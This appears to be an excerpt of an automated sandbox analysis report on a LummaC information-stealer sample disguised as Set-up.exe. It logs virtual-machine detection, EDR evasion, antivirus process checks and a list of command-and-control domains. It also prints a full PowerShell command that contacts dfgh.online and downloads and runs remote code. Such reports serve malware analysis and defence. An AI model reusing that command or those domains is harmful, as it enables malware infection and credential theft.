              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BB27C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB2F3E1 second address: 6BB2F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB2F3FD second address: 6BB2F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F1E51375365h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F1E513753F0h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7444Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2267Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exe TID: 1456Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep count: 7444 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 2267 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Set-up.exe, 00000000.00000002.2016981585.000000000092F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016514854.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: Set-up.exe, Set-up.exe, 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              LummaC encrypted strings found
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: Set-up.exe, 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: shockingrefle.click
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; y
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; yJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
